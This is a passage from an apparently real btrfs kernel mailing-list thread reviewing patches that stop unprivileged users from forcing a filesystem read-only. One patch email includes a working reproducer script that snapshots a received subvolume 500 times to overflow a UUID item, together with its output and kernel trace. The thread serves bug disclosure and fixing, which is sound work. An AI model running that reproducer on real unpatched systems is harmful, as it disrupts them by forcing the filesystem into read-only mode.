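 * Mirrors the quoted condition for the "extend" case: growing an existing
 * item of cur_item_size bytes by data_size bytes. If the grown item plus
 * its item header cannot fit in a leaf of its own, no split can help.
 */
static int check_extend_item(uint32_t nodesize, uint32_t cur_item_size,
			     uint32_t data_size)
{
	if (data_size + cur_item_size + SKETCH_ITEM_SIZE >
	    leaf_data_size(nodesize))
		return -EOVERFLOW;
	return 0;
}
```

Under these assumed sizes a 4K leaf has 3995 bytes of item space, so a dir item that has already grown to 3900 bytes can take at most 70 more bytes before the check fails. That is why the earlier free-space test is not enough: it only decides that a split is needed, while this check decides that a split cannot succeed.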
> >
> >
> > Also, would it theoretically be possible to extend the collision
> > handling to allow collisions to span leaves or is there some reason that
> > is a complete no-go?
>
> And how would you do that, without changing the on-disk format with
> new keys and/or item types?
> We would have to have new keys and the data split across several
> items, like we did for extrefs over a decade ago.
Yup, makes sense, you're right.
>
> Thanks.
>
> >
> > Regardless of the answers, this is well reasoned, well tested, and a
> > clear improvement so please add:
> >
> > Reviewed-by: Boris Burkov <boris@bur.io>
> >
> > > Signed-off-by: Filipe Manana <fdmanana@suse.com>
> > > ---
> > > fs/btrfs/inode.c | 19 +++++++++++++++++++
> > > 1 file changed, 19 insertions(+)
> > >
> > > diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
> > > index b9f1bd18ea62..9a26fc5a5263 100644
> > > --- a/fs/btrfs/inode.c
> > > +++ b/fs/btrfs/inode.c
> > > @@ -6635,6 +6635,25 @@ int btrfs_create_new_inode(struct btrfs_trans_handle *trans,
> > > int ret;
> > > bool xa_reserved = false;
> > >
> > > + if (!args->orphan && !args->subvol) {
> > > + /*
> > > + * Before anything else, check if we can add the name to the
> > > + * parent directory. We want to avoid a dir item overflow in
> > > + * case we have an existing dir item due to existing name
> > > + * hash collisions. We do this check here before we call
> > > + * btrfs_add_link() down below so that we can avoid a
> > > + * transaction abort (which could be exploited by malicious
> > > + * users).
> > > + *
> > > + * For subvolumes we already do this in btrfs_mksubvol().
> > > + */
> > > + ret = btrfs_check_dir_item_collision(BTRFS_I(dir)->root,
> > > + btrfs_ino(BTRFS_I(dir)),
> > > + name);
> > > + if (ret < 0)
> > > + return ret;
> > > + }
> > > +
> > > path = btrfs_alloc_path();
> > > if (!path)
> > > return -ENOMEM;
> > > --
> > > 2.47.2
> > >
* Re: [PATCH 2/5] btrfs: fix transaction abort when snapshotting received subvolumes
2026-02-26 20:40 ` Qu Wenruo
@ 2026-02-26 21:30 ` Filipe Manana
0 siblings, 0 replies; 15+ messages in thread
From: Filipe Manana @ 2026-02-26 21:30 UTC (permalink / raw)
To: Qu Wenruo; +Cc: linux-btrfs
On Thu, Feb 26, 2026 at 8:40 PM Qu Wenruo <quwenruo.btrfs@gmx.com> wrote:
>
>
>
> On 2026/2/27 01:03, fdmanana@kernel.org wrote:
> > From: Filipe Manana <fdmanana@suse.com>
> >
> > Currently a user can trigger a transaction abort by snapshotting a
> > previously received snapshot a bunch of times until we reach a
> > BTRFS_UUID_KEY_RECEIVED_SUBVOL item overflow (the maximum item size we
> > can store in a leaf). This is very likely not common in practice, but
> > if it happens, it turns the filesystem into RO mode. The snapshot, send,
> > set_received_subvol and subvol_setflags (used by receive) operations don't
> > require CAP_SYS_ADMIN, just inode_owner_or_capable(). A malicious user
> > could use this to turn a filesystem into RO mode and disrupt a system.
> >
> > Reproducer script:
> >
> > $ cat test.sh
> > #!/bin/bash
> >
> > DEV=/dev/sdi
> > MNT=/mnt/sdi
> >
> > # Use smallest node size to make the test faster.
> > mkfs.btrfs -f --nodesize 4K $DEV
> > mount $DEV $MNT
> >
> > # Create a subvolume and set it to RO so that it can be used for send.
> > btrfs subvolume create $MNT/sv
> > touch $MNT/sv/foo
> > btrfs property set $MNT/sv ro true
> >
> > # Send and receive the subvolume into snaps/sv.
> > mkdir $MNT/snaps
> > btrfs send $MNT/sv | btrfs receive $MNT/snaps
> >
> > # Now snapshot the received subvolume, which has a received_uuid, a
> > # lot of times to trigger the leaf overflow.
> > total=500
> > for ((i = 1; i <= $total; i++)); do
> > echo -ne "\rCreating snapshot $i/$total"
> > btrfs subvolume snapshot -r $MNT/snaps/sv $MNT/snaps/sv_$i > /dev/null
> > done
> > echo
> >
> > umount $MNT
> >
> > When running the test:
> >
> > $ ./test.sh
> > (...)
> > Create subvolume '/mnt/sdi/sv'
> > At subvol /mnt/sdi/sv
> > At subvol sv
> > Creating snapshot 496/500ERROR: Could not create subvolume: Value too large for defined data type
> > Creating snapshot 497/500ERROR: Could not create subvolume: Read-only file system
> > Creating snapshot 498/500ERROR: Could not create subvolume: Read-only file system
> > Creating snapshot 499/500ERROR: Could not create subvolume: Read-only file system
> > Creating snapshot 500/500ERROR: Could not create subvolume: Read-only file system
> >
> > And in dmesg/syslog:
> >
> > $ dmesg
> > (...)
> > [251067.627338] BTRFS warning (device sdi): insert uuid item failed -75 (0x4628b21c4ac8d898, 0x2598bee2b1515c91) type 252!
> > [251067.629212] ------------[ cut here ]------------
> > [251067.630033] BTRFS: Transaction aborted (error -75)
> > [251067.630871] WARNING: fs/btrfs/transaction.c:1907 at create_pending_snapshot.cold+0x52/0x465 [btrfs], CPU#10: btrfs/615235
> > [251067.632851] Modules linked in: btrfs dm_zero (...)
> > [251067.644071] CPU: 10 UID: 0 PID: 615235 Comm: btrfs Tainted: G W 6.19.0-rc8-btrfs-next-225+ #1 PREEMPT(full)
> > [251067.646165] Tainted: [W]=WARN
> > [251067.646733] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014
> > [251067.648735] RIP: 0010:create_pending_snapshot.cold+0x55/0x465 [btrfs]
> > [251067.649984] Code: f0 48 0f (...)
> > [251067.653313] RSP: 0018:ffffce644908fae8 EFLAGS: 00010292
> > [251067.653987] RAX: 00000000ffffff01 RBX: ffff8e5639e63a80 RCX: 00000000ffffffd3
> > [251067.655042] RDX: ffff8e53faa76b00 RSI: 00000000ffffffb5 RDI: ffffffffc0919750
> > [251067.656077] RBP: ffffce644908fbd8 R08: 0000000000000000 R09: ffffce644908f820
> > [251067.657068] R10: ffff8e5adc1fffa8 R11: 0000000000000003 R12: ffff8e53c0431bd0
> > [251067.658050] R13: ffff8e5414593600 R14: ffff8e55efafd000 R15: 00000000ffffffb5
> > [251067.659019] FS: 00007f2a4944b3c0(0000) GS:ffff8e5b27dae000(0000) knlGS:0000000000000000
> > [251067.660115] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> > [251067.660943] CR2: 00007ffc5aa57898 CR3: 00000005813a2003 CR4: 0000000000370ef0
> > [251067.661972] Call Trace:
> > [251067.662292] <TASK>
> > [251067.662653] create_pending_snapshots+0x97/0xc0 [btrfs]
> > [251067.663413] btrfs_commit_transaction+0x26e/0xc00 [btrfs]
> > [251067.664257] ? btrfs_qgroup_convert_reserved_meta+0x35/0x390 [btrfs]
> > [251067.665238] ? _raw_spin_unlock+0x15/0x30
> > [251067.665837] ? record_root_in_trans+0xa2/0xd0 [btrfs]
> > [251067.666531] btrfs_mksubvol+0x330/0x580 [btrfs]
> > [251067.667145] btrfs_mksnapshot+0x74/0xa0 [btrfs]
> > [251067.667827] __btrfs_ioctl_snap_create+0x194/0x1d0 [btrfs]
> > [251067.668595] btrfs_ioctl_snap_create_v2+0x107/0x130 [btrfs]
> > [251067.669479] btrfs_ioctl+0x1580/0x2690 [btrfs]
> > [251067.670093] ? count_memcg_events+0x6d/0x180
> > [251067.670849] ? handle_mm_fault+0x1a0/0x2a0
> > [251067.671652] __x64_sys_ioctl+0x92/0xe0
> > [251067.672406] do_syscall_64+0x50/0xf20
> > [251067.673129] entry_SYSCALL_64_after_hwframe+0x76/0x7e
> > [251067.674096] RIP: 0033:0x7f2a495648db
> > [251067.674812] Code: 00 48 89 (...)
> > [251067.678227] RSP: 002b:00007ffc5aa57840 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
> > [251067.679691] RAX: ffffffffffffffda RBX: 0000000000000003 RCX: 00007f2a495648db
> > [251067.681145] RDX: 00007ffc5aa588b0 RSI: 0000000050009417 RDI: 0000000000000004
> > [251067.682511] RBP: 0000000000000002 R08: 0000000000000000 R09: 0000000000000000
> > [251067.683842] R10: 000000000000000a R11: 0000000000000246 R12: 00007ffc5aa59910
> > [251067.685176] R13: 00007ffc5aa588b0 R14: 0000000000000004 R15: 0000000000000006
> > [251067.686524] </TASK>
> > [251067.686972] ---[ end trace 0000000000000000 ]---
> > [251067.687890] BTRFS: error (device sdi state A) in create_pending_snapshot:1907: errno=-75 unknown
> > [251067.689049] BTRFS info (device sdi state EA): forced readonly
> > [251067.689054] BTRFS warning (device sdi state EA): Skipping commit of aborted transaction.
> > [251067.690119] BTRFS: error (device sdi state EA) in cleanup_transaction:2043: errno=-75 unknown
> > [251067.702028] BTRFS info (device sdi state EA): last unmount of filesystem 46dc3975-30a2-4a69-a18f-418b859cccda
> >
> > Fix this by ignoring -EOVERFLOW errors from btrfs_uuid_tree_add() in the
> > snapshot creation code when attempting to add the
> > BTRFS_UUID_KEY_RECEIVED_SUBVOL item. This is ok because it's not critical
> > and we are still able to delete the snapshot, as snapshot/subvolume
> > deletion ignores if a BTRFS_UUID_KEY_RECEIVED_SUBVOL is missing (see
> > inode.c:btrfs_delete_subvolume()). As for send/receive, we can still do
> > send/receive operations since it always peeks the first root ID in the
> > existing BTRFS_UUID_KEY_RECEIVED_SUBVOL (it could peek any since all
> > snapshots have the same content), and even if the key is missing, it
> > falls back to searching by BTRFS_UUID_KEY_SUBVOL key.
> >
> > A test case for fstests will be sent soon.
> >
> > Fixes: dd5f9615fc5c ("Btrfs: maintain subvolume items in the UUID tree")
> > Signed-off-by: Filipe Manana <fdmanana@suse.com>
> > ---
> > fs/btrfs/transaction.c | 16 ++++++++++++++++
> > 1 file changed, 16 insertions(+)
> >
> > diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
> > index 3112bd5520b7..1a0daf2c68fb 100644
> > --- a/fs/btrfs/transaction.c
> > +++ b/fs/btrfs/transaction.c
> > @@ -1902,6 +1902,22 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
> > ret = btrfs_uuid_tree_add(trans, new_root_item->received_uuid,
> > BTRFS_UUID_KEY_RECEIVED_SUBVOL,
> > objectid);
>
> I'm just checking all other btrfs_uuid_tree_add() callsites, and
> wondering if other call sites are also affected:
>
> - _btrfs_ioctl_set_received_subvol()
>
> Would this be affected too?
It can be abused too, but that will require a different fix and is out of
the scope of this patch.
Besides btrfs-progs' receive command, there are no wrappers for the ioctl
that I know of, so I will need to write a C program in fstests to craft a
reproducer.
Thanks.
>
> Thanks,
> Qu
>
> > + /*
> > + * We are creating a lot of snapshots of the same root that was
> > + * received (has a received UUID) and reached a leaf's limit for
> > + * an item. We can safely ignore this and avoid a transaction
> > + * abort. A deletion of this snapshot will still work since we
> > + * ignore if an item with a BTRFS_UUID_KEY_RECEIVED_SUBVOL key
> > + * is missing (see btrfs_delete_subvolume()). Send/receive will
> > + * work too since it peeks the first root id from the existing
> > + * item (it could peek any), and in case it's missing it
> > + * falls back to search by BTRFS_UUID_KEY_SUBVOL keys.
> > + * Creation of a snapshot does not require CAP_SYS_ADMIN, so
> > + * we don't want users triggering transaction aborts, either
> > + * intentionally or not.
> > + */
> > + if (ret == -EOVERFLOW)
> > + ret = 0;
> > if (unlikely(ret && ret != -EEXIST)) {
> > btrfs_abort_transaction(trans, ret);
> > goto fail;
>
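The error handling in the hunk above can be modeled as a small standalone predicate. This is a sketch under the assumption that the only decision being made is whether a return value from the UUID item insertion should abort the transaction. The function name uuid_add_error_is_fatal() is hypothetical:

```c
#include <assert.h>
#include <errno.h>
#include <stdbool.h>

/*
 * Decide whether an error from adding the received-UUID item should abort
 * the transaction. Follows the hunk above: -EOVERFLOW is downgraded to
 * success because the item is not critical, -EEXIST is tolerated as
 * before, and anything else is treated as fatal.
 */
static bool uuid_add_error_is_fatal(int ret)
{
	assert(ret <= 0); /* kernel-style convention: 0 or a negative errno */

	if (ret == -EOVERFLOW)
		ret = 0;

	return ret != 0 && ret != -EEXIST;
}
```

With this shape, only unexpected errors such as -ENOMEM or -EIO would lead to an abort, while a full BTRFS_UUID_KEY_RECEIVED_SUBVOL item simply means the new snapshot is not recorded in it.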
* Re: [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode
2026-02-26 21:18 ` Filipe Manana
@ 2026-02-26 21:57 ` Boris Burkov
0 siblings, 0 replies; 15+ messages in thread
From: Boris Burkov @ 2026-02-26 21:57 UTC (permalink / raw)
To: Filipe Manana; +Cc: linux-btrfs
On Thu, Feb 26, 2026 at 09:18:06PM +0000, Filipe Manana wrote:
> On Thu, Feb 26, 2026 at 7:09 PM Boris Burkov <boris@bur.io> wrote:
> >
> > On Thu, Feb 26, 2026 at 02:33:57PM +0000, fdmanana@kernel.org wrote:
> > > From: Filipe Manana <fdmanana@suse.com>
> > >
> > > We have a couple scenarios that regular users can exploit to trigger a
> > > transaction abort and turn a filesystem into RO mode, causing some
> > > disruption. The first 2 patches fix these, the remainder are just a few
> > > trivial cleanups.
> >
> > Bug fixes and cleanups look good. No need to abort in these cases as you
> > have shown.
> > Reviewed-by: Boris Burkov <boris@bur.io>
> >
> > But on the topic of security, or malicious users:
> >
> > How is this sort of attack conceptually different from simply filling
> > up the filesystem with fallocates then doing random metadata operations
> > until we ENOSPC and go readonly?
>
> What makes you think that users causing an ENOSPC that triggers a
> transaction abort isn't an issue?
>
> If we know of any intentional way to trigger that, we should definitely fix it.
> Even some weeks ago I fixed such a case reported by a user when
> running bonnie++:
>
> https://lore.kernel.org/linux-btrfs/SA1PR18MB56922F690C5EC2D85371408B998FA@SA1PR18MB5692.namprd18.prod.outlook.com/
>
> We often see users reporting that sort of issue, but we don't know the
> workloads, how to reproduce and the state of their fs most of the
> time.
>
> >
> > What about if the attacker also exploits the behavior of the extent
> > allocator to try to produce fragmentation-driven metadata ENOSPC
> > aborts?
>
> Do you know of a way to do that?
> If you do, we should fix it.
>
> No matter what a user does, especially a non-privileged user, it
> should not trigger transaction aborts in an easy way (or anything else
> bad, like memory leaks, use-after-frees, NULL pointer derefs, etc).
Fair enough, I like this stance.
Looks like I had too low of an opinion of our intended ENOSPC
guarantees :)
>
> Thanks.
>
> >
> > Thanks,
> > Boris
> >
> > >
> > > Filipe Manana (5):
> > > btrfs: fix transaction abort on file creation due to name hash collision
> > > btrfs: fix transaction abort when snapshotting received subvolumes
> > > btrfs: stop checking for -EEXIST return value from btrfs_uuid_tree_add()
> > > btrfs: remove duplicated uuid tree existence check in btrfs_uuid_tree_add()
> > > btrfs: remove pointless error check in btrfs_check_dir_item_collision()
> > >
> > > fs/btrfs/dir-item.c | 4 +---
> > > fs/btrfs/inode.c | 19 +++++++++++++++++++
> > > fs/btrfs/ioctl.c | 2 +-
> > > fs/btrfs/transaction.c | 18 +++++++++++++++++-
> > > fs/btrfs/uuid-tree.c | 5 +----
> > > 5 files changed, 39 insertions(+), 9 deletions(-)
> > >
> > > --
> > > 2.47.2
> > >
* Re: [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode
2026-02-26 14:33 [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode fdmanana
` (5 preceding siblings ...)
2026-02-26 19:10 ` [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode Boris Burkov
@ 2026-02-26 23:10 ` Qu Wenruo
6 siblings, 0 replies; 15+ messages in thread
From: Qu Wenruo @ 2026-02-26 23:10 UTC (permalink / raw)
To: fdmanana, linux-btrfs
On 2026/2/27 01:03, fdmanana@kernel.org wrote:
> From: Filipe Manana <fdmanana@suse.com>
>
> We have a couple scenarios that regular users can exploit to trigger a
> transaction abort and turn a filesystem into RO mode, causing some
> disruption. The first 2 patches fix these, the remainder are just a few
> trivial cleanups.
>
Reviewed-by: Qu Wenruo <wqu@suse.com>
Thanks,
Qu
> Filipe Manana (5):
> btrfs: fix transaction abort on file creation due to name hash collision
> btrfs: fix transaction abort when snapshotting received subvolumes
> btrfs: stop checking for -EEXIST return value from btrfs_uuid_tree_add()
> btrfs: remove duplicated uuid tree existence check in btrfs_uuid_tree_add()
> btrfs: remove pointless error check in btrfs_check_dir_item_collision()
>
> fs/btrfs/dir-item.c | 4 +---
> fs/btrfs/inode.c | 19 +++++++++++++++++++
> fs/btrfs/ioctl.c | 2 +-
> fs/btrfs/transaction.c | 18 +++++++++++++++++-
> fs/btrfs/uuid-tree.c | 5 +----
> 5 files changed, 39 insertions(+), 9 deletions(-)
>